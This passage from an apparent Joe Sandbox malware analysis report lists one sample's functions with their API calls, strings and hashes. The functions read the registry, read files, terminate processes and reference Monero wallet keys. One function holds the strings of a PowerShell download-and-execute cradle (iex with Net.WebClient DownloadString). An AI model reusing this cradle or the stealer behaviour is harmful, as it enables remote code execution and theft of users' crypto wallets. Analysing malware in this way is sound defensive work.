                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                              • String ID:
                              • API String ID: 3066467675-0
                              • Opcode ID: 8ebf6af54f81f7fa9e8e4c8b8bffb8381438926be5ed4aa8e56db89665e19951
                              • Instruction ID: 72186b96d185a34ff6b40c7b7b7618e4eb8df11f92d4c942439e14c92cc2eb18
                              • Opcode Fuzzy Hash: 8ebf6af54f81f7fa9e8e4c8b8bffb8381438926be5ed4aa8e56db89665e19951
                              • Instruction Fuzzy Hash: 7131F5B4A04218ABDB24CF94DC85BDCB7B4FB48304F1081D8AA09A7280C6706AC58F98
                              Function 00828290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 67memoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,015FDC20,00000000,?,00830E14,00000000,?,00000000), ref: 008282C0
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008282C7
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008282E8
                              • wsprintfA.USER32 ref: 0082833C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
                              • API String ID: 2922868504-3474575989
                              • Opcode ID: a205dc79e0470dee0a459b87fccd70ff61f502ce7e4cad251daab8a52ee625da
                              • Instruction ID: 64cd89721d35c1424c8b2f6ae2c0febf40668d82853cfb866b443595b20312d4
                              • Opcode Fuzzy Hash: a205dc79e0470dee0a459b87fccd70ff61f502ce7e4cad251daab8a52ee625da
                              • Instruction Fuzzy Hash: D5211AB1E44359ABDB00DFD8DC4AFAEBBB8FB44B14F104509F615BB280C77869018BA5
                              Function 0082856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008285B6
                              • wsprintfA.USER32 ref: 008285E9
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0082860B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0082861C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00828629
                                • Part of subcall function 0082AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0082AAF6
                              • RegQueryValueExA.ADVAPI32(00000000,015FDC08,00000000,000F003F,?,00000400), ref: 0082867C
                              • lstrlen.KERNEL32(?), ref: 00828691
                              • RegQueryValueExA.ADVAPI32(00000000,015FDBD8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00830B3C), ref: 00828729
                              • RegCloseKey.ADVAPI32(00000000), ref: 00828798
                              • RegCloseKey.ADVAPI32(00000000), ref: 008287AA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                              • String ID: %s\%s
                              • API String ID: 3896182533-4073750446
                              • Opcode ID: 5da7e1841a335395e0e1e3343f05eee8faadb604dde10dc74962537d1d2c2a7c
                              • Instruction ID: 7e22659acfd86812a8abbb6fb870a5af43bba20102e247052aeb0e207e9d4f75
                              • Opcode Fuzzy Hash: 5da7e1841a335395e0e1e3343f05eee8faadb604dde10dc74962537d1d2c2a7c
                              • Instruction Fuzzy Hash: 9A21EA7191122CABDB24DB54DC85FE9B3B8FB48704F1085D8A609A6180DF716A85CF94
                              Function 008299A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 008299C5
                              • Process32First.KERNEL32(0081A056,00000128), ref: 008299D9
                              • Process32Next.KERNEL32(0081A056,00000128), ref: 008299F2
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00829A4E
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00829A6C
                              • CloseHandle.KERNEL32(00000000), ref: 00829A79
                              • CloseHandle.KERNEL32(0081A056), ref: 00829A88
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 2696918072-0
                              • Opcode ID: c8e742d51460661f44df26156421b267fb891c253a60abf8af8c76cd4815370f
                              • Instruction ID: 9ec7b81cc5c60a1cde980499f49fccee49a092ec10201346997f28d14b7dc079
                              • Opcode Fuzzy Hash: c8e742d51460661f44df26156421b267fb891c253a60abf8af8c76cd4815370f
                              • Instruction Fuzzy Hash: 0C21EA71904328ABDB21DFA5EC88BDDB7B5FB48304F1041C8E50AAA290D7749EC5CF50
                              Function 00827820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00827834
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0082783B
                              • RegOpenKeyExA.ADVAPI32(80000002,015EB968,00000000,00020119,00000000), ref: 0082786D
                              • RegQueryValueExA.ADVAPI32(00000000,015FDB18,00000000,00000000,?,000000FF), ref: 0082788E
                              • RegCloseKey.ADVAPI32(00000000), ref: 00827898
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: Windows 11
                              • API String ID: 3225020163-2517555085
                              • Opcode ID: 241aa7e22fb95efbf153d5bf47f4a327ac2f72f19e100813a615495885559f15
                              • Instruction ID: 4fed0635a343183ca30ebf22b3ee390568ca4640b77cccc92a81e72e02676008
                              • Opcode Fuzzy Hash: 241aa7e22fb95efbf153d5bf47f4a327ac2f72f19e100813a615495885559f15
                              • Instruction Fuzzy Hash: CA014F75A48349FBEB00DBE5ED89FAE7778EB48700F004198FB04EA290E6709941CB50
                              Function 008278B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 008278C4
                              • RtlAllocateHeap.NTDLL(00000000), ref: 008278CB
                              • RegOpenKeyExA.ADVAPI32(80000002,015EB968,00000000,00020119,00827849), ref: 008278EB
                              • RegQueryValueExA.ADVAPI32(00827849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0082790A
                              • RegCloseKey.ADVAPI32(00827849), ref: 00827914
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                              • String ID: CurrentBuildNumber
                              • API String ID: 3225020163-1022791448
                              • Opcode ID: 7de0d6d271ccc661a987797168ec3d95ce7451141b4f63e2747e4092fe444df9
                              • Instruction ID: 1dd605aaa4e4459306eafe2824ae60f1ed2b175f3099dca9b77ade125cb817ce
                              • Opcode Fuzzy Hash: 7de0d6d271ccc661a987797168ec3d95ce7451141b4f63e2747e4092fe444df9
                              • Instruction Fuzzy Hash: F90144B5A44309BBDB00DBD4DC8AFAE7778EB44700F004594F605EA290DB705A418B91
                              Function 0081A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0081A13C
                              • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0081A161
                              • LocalAlloc.KERNEL32(00000040,?), ref: 0081A181
                              • ReadFile.KERNEL32(000000FF,?,00000000,0081148F,00000000), ref: 0081A1AA
                              • LocalFree.KERNEL32(0081148F), ref: 0081A1E0
                              • CloseHandle.KERNEL32(000000FF), ref: 0081A1EA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                              • String ID:
                              • API String ID: 2311089104-0
                              • Opcode ID: 895e1a13b87ebd8f86da56aef443fde8fdd167267ae8364c26df84a4b03938ce
                              • Instruction ID: d42d913f8863232f0909d335e12d975f5c2ff4aba417ee479e92208e98638ca7
                              • Opcode Fuzzy Hash: 895e1a13b87ebd8f86da56aef443fde8fdd167267ae8364c26df84a4b03938ce
                              • Instruction Fuzzy Hash: 0F31EC74A01209EFDB14CFA4D885FEE77B9FF48314F108159E911AB290D774AA85CFA1
                              Function 008249D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcat.KERNEL32(?,015FDE30), ref: 00824A2B
                                • Part of subcall function 00828F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00828F9B
                              • lstrcat.KERNEL32(?,00000000), ref: 00824A51
                              • lstrcat.KERNEL32(?,?), ref: 00824A70
                              • lstrcat.KERNEL32(?,?), ref: 00824A84
                              • lstrcat.KERNEL32(?,015EB248), ref: 00824A97
                              • lstrcat.KERNEL32(?,?), ref: 00824AAB
                              • lstrcat.KERNEL32(?,015FD178), ref: 00824ABF
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 00828F20: GetFileAttributesA.KERNEL32(00000000,?,00811B94,?,?,0083577C,?,?,00830E22), ref: 00828F2F
                                • Part of subcall function 008247C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 008247D0
                                • Part of subcall function 008247C0: RtlAllocateHeap.NTDLL(00000000), ref: 008247D7
                                • Part of subcall function 008247C0: wsprintfA.USER32 ref: 008247F6
                                • Part of subcall function 008247C0: FindFirstFileA.KERNEL32(?,?), ref: 0082480D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                              • String ID:
                              • API String ID: 2540262943-0
                              • Opcode ID: 2cd021a3fba270801996737fffc736d19487ef9fe8b46e00940cf952e8c5737b
                              • Instruction ID: 10c5adba51bef78612279f58f407a2dc468c5f6e29030d901c1c6e212f5bf426
                              • Opcode Fuzzy Hash: 2cd021a3fba270801996737fffc736d19487ef9fe8b46e00940cf952e8c5737b
                              • Instruction Fuzzy Hash: A4315EF2900228A7CF14EBB4EC96EED733CFB58700F404589B70596055EE70A6C9CB95
                              Function 00822EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 0082AA50: lstrcpy.KERNEL32(00830E1A,00000000), ref: 0082AA98
                                • Part of subcall function 0082ACC0: lstrlen.KERNEL32(?,015F8840,?,\Monero\wallet.keys,00830E1A), ref: 0082ACD5
                                • Part of subcall function 0082ACC0: lstrcpy.KERNEL32(00000000), ref: 0082AD14
                                • Part of subcall function 0082ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0082AD22
                                • Part of subcall function 0082AC30: lstrcpy.KERNEL32(00000000,?), ref: 0082AC82
                                • Part of subcall function 0082AC30: lstrcat.KERNEL32(00000000), ref: 0082AC92
                                • Part of subcall function 0082ABB0: lstrcpy.KERNEL32(?,00830E1A), ref: 0082AC15
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00822FD5
                              Strings
                              • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00822F14
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00822F54
                              • <, xrefs: 00822F89
                              • ')", xrefs: 00822F03
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                              • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              • API String ID: 3031569214-898575020
                              • Opcode ID: 79b4f327ab9a41df0ead627e6c96639b71d5f732cde6bb7fb595ea25869497ff
                              • Instruction ID: dd7d232a9a1975b4e66eabb70bcdc1af089972a4373830cf339a3cc901ba1ede
                              • Opcode Fuzzy Hash: 79b4f327ab9a41df0ead627e6c96639b71d5f732cde6bb7fb595ea25869497ff
                              • Instruction Fuzzy Hash: D241FD71D102289BDB18FBA4E8A2BEDB779FF10310F404459E416F6192DF752A89CF92
                              Function 00824300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON
                              Download Yara Rule
                              APIs
                              • RegOpenKeyExA.ADVAPI32(80000001,015FD198,00000000,00020119,?), ref: 00824344
                              • RegQueryValueExA.ADVAPI32(?,015FDFB0,00000000,00000000,00000000,000000FF), ref: 00824368
                              • RegCloseKey.ADVAPI32(?), ref: 00824372
                              • lstrcat.KERNEL32(?,00000000), ref: 00824397
                              • lstrcat.KERNEL32(?,015FDEA8), ref: 008243AB
                              Memory Dump Source
                              • Source File: 00000000.00000002.2091172102.0000000000811000.00000040.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                              • Associated: 00000000.00000002.2091155209.0000000000810000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000083C000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.000000000097E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091172102.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000AFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D61000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091408083.0000000000D9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091694784.0000000000D9B000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091811355.0000000000F39000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2091826780.0000000000F3A000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_810000_file.jbxd
                              Yara matches
